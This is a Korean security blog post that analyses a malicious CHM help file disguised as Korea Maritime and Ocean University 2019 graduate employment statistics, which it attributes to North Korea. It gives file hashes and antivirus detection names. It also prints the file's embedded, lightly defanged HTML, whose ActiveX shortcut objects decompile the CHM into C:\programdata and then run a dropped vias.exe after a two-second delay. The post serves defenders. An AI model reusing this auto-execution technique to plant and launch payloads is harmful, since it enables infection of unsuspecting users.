꿈을꾸는 파랑새

오늘도 우리 주적인 북한에서 만든 국립 한국해양대학교를 노린 2019년 졸업자 취업통계조사 붙임. chm(2024.7.8)애 대해 알아보겠습니다.
일단 악성코드 해쉬값은 다음과 같습니다.
파일명:2019년 졸업자 취업통계조사 붙임.chm
사이즈:189 KB
MD5:972be4aec6506e8bf4dc8d72491099f6
SHA-1:bd9fc2efbd48468014b72717549ae2d12b47b247
SHA-256:8bbcbe5da611925fbe71c6b4b3ec34697b0ec4de4b9940e19ac94ff8f62e8d6f
취업률현황이라는 제목으로 보면 수능 치시는 고등학생들이 목표인 것을 추측할 수가 있습니다. 물론 재수생도 포함이겠죠.

악성코드 내용

2019년 졸업자 취업통계조사 붙임.chm 내부 모습
2019년 졸업자 취업통계조사 붙임.chm 내부 모습

2019년 졸업생 학부(과)별 취업률 및 유지취업률 
2019년 2월 졸업자(2018년 8월 졸업자포함)대상 건강보험 및 국세 DB연계 취업통계 조사결과 
조사기준일: 2019. 12. 31. 

2019년 졸업자 취업통계조사 붙임.chm 압축 해제 시 내부 모습
2019년 졸업자 취업통계조사 붙임.chm 압축 해제 시 내부 모습

악성코드 실행 관련 코드

<body><OBJECT id=x classid="clsid:a(d)b880a6-d8ff-(1)1cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',hh(.)exe,-decompile C:\\programdata 2019년 졸업자 취업통계조사 붙임(.)chm'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<OBJECT id=y classid="clsid:adb8(80)a6-d8ff-11cf-93(7)7-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',C:\\programdata\\vias(.)exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
var start=new Date().getTime();
while(true) if(new Date().getTime()-start>2000) break;
y.Click();
</SCRIPT>

악성코드 실행 코드
악성코드 실행 코드

코드 분석

1. 코드 구조 분석
ActiveX Object 와 JavaScript를 사용하여 악성 행위를 수행
ActiveX 객체 생성 (<OBJECT> 태그 사용)
classid="adb880a6-d8ff-11(c)f-9377-00aa(0)03b7a11 는 Microsoft HTML Help에서 사용되는 CLSID
hh.exe 명령어를 사용하여 2019년 졸업자 취업통계조사 붙임.chm 파일을 디컴파일
.chm 파일은 도움말 파일로 알려졌지만, 내부에 악성 스크립트나 명령어를 포함돼 있음
디컴파일은 해당. chm 파일의 내용을 풀어서 시스템에 저장하거나 실행하는 행위로 악성 코드가 해당 단계에서 동작
vias.exe 실행
코드에서는 vias.exe라는 실행 파일을 호출
C:\programdata\ 디렉터리는 시스템 전체에 접근할 수 있는 공용 디렉터리로 악성 파일이 이 경로에 배포되면 사용자가 눈치 채기 어려워요.
JavaScript를 통한 자동 실행
첫 번째 객체(x)가 클릭 되어 hh(.)exe 를 통해 .chm 파일을 디컴파일
2초 지연 후에 두 번째 객체(y)를 클릭하여 vias.exe를 실행
해당 지연은 탐지를 우회하거나 비동기 작업을 수행하기 위해 사용
일단 시간이 매우 지난 악성코드라서 뭐~추가 파일이 있는지 모르겠지만 일단 해당 악성코드들은 바이러스토탈에서 돌려 보면 대부분 보안 업체들은 정상적으로 탐지 및 차단을 하는 것을 볼 수가 있습니다.

WScript 악용한 악성코드 실행 및 삭제
WScript 악용한 악성코드 실행 및 삭제

AhnLab-V3:Dropper/HTML.Generic.SC188288
AliCloud:Trojan:Win/Fragtor.Gen
ALYac:Trojan.Downloader.CHM
Antiy-AVL:Trojan/Win32.Zpevdo
Arcabit:Trojan.Fragtor.D4388B
Avast:Win32:Trojan-gen
AVG:Win32:Trojan-gen
BitDefender:Gen:Variant.Fragtor.276619
Bkav Pro:W32.Common.875A6201
CTX:Chm.trojan.fragtor
DrWeb:BackDoor.Siggen2.4633
Emsisoft:Gen:Variant.Fragtor.276619 (B)
eScan:Gen:Variant.Fragtor.276619
ESET-NOD32:Win32/Agent.AESS
Fortinet:JS/Kimsuky.GOSU!tr
GData:Gen:Variant.Fragtor.276619
Google:Detected
Ikarus:Trojan.HTML.Agent
Jiangmin:Trojan.Agentb.pgq
Kaspersky:UDS:DangerousObject.Multi.Generic
Lionic:Trojan.HTML.Generic.4!c
MaxSecure:Trojan.Malware.116733653.susgen
Panda:Trj/Chgt.AD
Rising:Trojan.MouseJack/HTML!1.BE26 (CLASSIC)
Sangfor Engine Zero:Trojan.Generic-Script.Save.34c31f4c
Skyhigh (SWG):Dropper.avq
Sophos:Mal/Generic-S
Symantec:Trojan.Gen.NPE
Tencent:Script.Trojan.Generic.Udkl
Trellix (ENS):Dropper.avq
Trellix (HX):Gen:Variant.Fragtor.276619
TrendMicro:TROJ_GEN.R002C0PG824
Varist:JS/Agent.CAX
VIPRE:Gen:Variant.Fragtor.276619
ViRobot:Dropper.S.CHM.194515
기본적인 보안 수칙을 지키는 것이 중요 하면 그리고 wscript를 사용을 해서 C:\Users\사용자\AppData\Local\Temp\9122.vbe 사용을 하는 것 같은데 해당 파일을 구하지 못했습니다. 아마도 실행을 하고 폭파하는 것 같습니다. vbe 파일은 이름은 랜덤입니다.
아마도 수능을 치르는 고등학생과 학부모를 대상으로 한 것 같은 느낌이 들기도 합니다. 아마도 해당 부분은 변형해서 응용할 수가 있을 것입니다. 그러니 항상 주의하는 습관을 가지는 것이 중요합니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band